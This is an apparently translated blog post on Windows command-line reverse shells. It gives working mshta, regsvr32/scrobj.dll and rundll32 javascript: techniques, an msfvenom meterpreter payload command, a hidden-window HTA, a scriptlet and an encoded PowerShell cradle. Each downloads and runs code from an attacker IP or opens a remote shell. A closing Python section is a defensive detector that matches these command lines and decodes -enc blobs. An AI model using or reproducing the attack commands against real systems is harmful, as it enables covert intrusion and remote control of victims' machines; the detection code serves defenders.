Windows command-line reverse shells (part 2)

2019-12-13  CSeroad

The mshta command

Run the command

mshta http://47.94.80.xxx/payload.hta

The source of payload.hta is

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
' Move the window off-screen so nothing is visible while the payload runs
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "shellcode" ' can be an exe or a PowerShell command
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>

The shellcode is generated with msf:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.94.80.xxx   LPORT=8080 -f exe > test.exe

Here the trojan is replaced with PowerShell; the script, after base64 encoding, is:

# The download-and-run script; -EncodedCommand expects base64 over the UTF-16LE bytes of the script
$fileContent = "(new-object System.Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/test.exe','D:\a.exe');start-process 'D:\a.exe'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)   # Unicode here means UTF-16LE
$encoded = [System.Convert]::ToBase64String($bytes)

Then decode and execute it with -enc:

powershell  -enc  $encoded

A shell is returned.

The regsvr32 command

regsvr32 /u /s /i:http://47.94.80.xxx/down.sct scrobj.dll

The source of down.sct is

<?XML version="1.0"?>
<scriptlet>
<registration
    description="Test"
    progid="Test"
    version="1.00"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}"
    >
    <script language="JScript">
        <![CDATA[
            new ActiveXObject("WScript.Shell").Run("powershell (new-object System.Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/test.exe','D:\\a.exe');start-process 'D:\\a.exe'",0,true);
        ]]>
    </script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
    <![CDATA[
        function Exec()
        {
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        }
    ]]>
</script>
</scriptlet>

After running it, a shell is returned.

The rundll32 command

MyJSRat is recommended here:
https://github.com/Ridter/MyJSRat
After downloading it, run

python MyJSRat.py -i  144.34.184.xxx -p  8080

Open Client Command

Run in cmd

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://144.34.184.2xx:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

and a shell is obtained.
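All three sections above (mshta loading a remote .hta, regsvr32 /i: pointing at a remote .sct with scrobj.dll, and rundll32 javascript:) plus the powershell -enc step share one shape on the endpoint: a signed Windows binary launched with an argument it never needs for legitimate work. The following is an added example written for this page, not code from the post or from MyJSRat, of how a defender would match those command lines from a process-creation feed and decode the -enc blob for triage. The command lines and hosts (example.invalid) are constructed test data.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Process-creation command lines as an EDR or Sysmon Event ID 1 feed would
# report them.  Every line here is constructed for this example; the hosts
# are placeholders.
SAMPLE_COMMAND_LINES = [
    "mshta http://example.invalid/payload.hta",
    "regsvr32 /u /s /i:http://example.invalid/down.sct scrobj.dll",
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();',
    # Legitimate uses of the same binaries, which must not trigger.
    "regsvr32 /s C:\\Windows\\System32\\vbscript.dll",
    "rundll32.exe shell32.dll,Control_RunDLL",
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# The download-and-run cradle from the post, encoded the way -enc expects:
# base64 over the UTF-16LE bytes of the script (constructed sample).
CRADLE = ("(new-object System.Net.WebClient).DownloadFile("
          "'http://example.invalid/test.exe','D:\\a.exe');start-process 'D:\\a.exe'")
ENCODED_SAMPLE = "powershell -enc " + base64.b64encode(
    CRADLE.encode("utf-16-le")).decode("ascii")


@dataclass
class Finding:
    rule: str
    command_line: str
    detail: str = ""


# First-stage rules over the raw command line.  Each pairs the LOLBin with
# the argument shape that only the remote-payload abuse needs, so ordinary
# local use (a DLL path, a control-panel entry point) stays quiet.
RULES = [
    ("mshta_remote_hta",
     re.compile(r"\bmshta(?:\.exe)?\b.*\b(?:https?|ftp)://", re.I)),
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:\s*https?://.*\bscrobj\.dll\b", re.I)),
    ("rundll32_javascript",
     re.compile(r"\brundll32(?:\.exe)?\b.*\bjavascript:", re.I)),
    # powershell.exe accepts -e, -ec, -en, -enc, -encoded, -encodedcommand;
    # the capture group is the base64 blob that follows.
    ("powershell_encoded_command",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-e(?:c|n|nc|ncoded(?:command)?)?\s+"
                r"([A-Za-z0-9+/=]{16,})", re.I)),
]

# Second-stage rule applied to the decoded script text.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-Expression|\bIEX\b|Start-Process", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse the -enc transform; None when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan(command_line: str) -> List[Finding]:
    """Return every rule that fires on one command line, in rule order."""
    findings: List[Finding] = []
    for name, pattern in RULES:
        match = pattern.search(command_line)
        if not match:
            continue
        if name != "powershell_encoded_command":
            findings.append(Finding(name, command_line))
            continue
        decoded = decode_encoded_command(match.group(1))
        findings.append(Finding(name, command_line, decoded or "<undecodable>"))
        if decoded and DOWNLOAD_CRADLE.search(decoded):
            findings.append(Finding("decoded_download_cradle", command_line, decoded))
    return findings


def summarize(command_lines: List[str]) -> Dict[str, int]:
    """Count rule hits across a batch of command lines."""
    counts: Dict[str, int] = {}
    for line in command_lines:
        for finding in scan(line):
            counts[finding.rule] = counts.get(finding.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES + [ENCODED_SAMPLE]:
        for f in scan(line):
            print(f"[{f.rule}] {f.command_line[:60]}")
            if f.detail:
                print(f"    decoded: {f.detail}")
```

The regexes key on the combination of binary and argument rather than the binary alone, which is what keeps the three benign lines silent; decoding the -enc blob and re-scanning it is what turns an opaque "encoded PowerShell" alert into a readable download cradle an analyst can act on.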

Another filler post done.
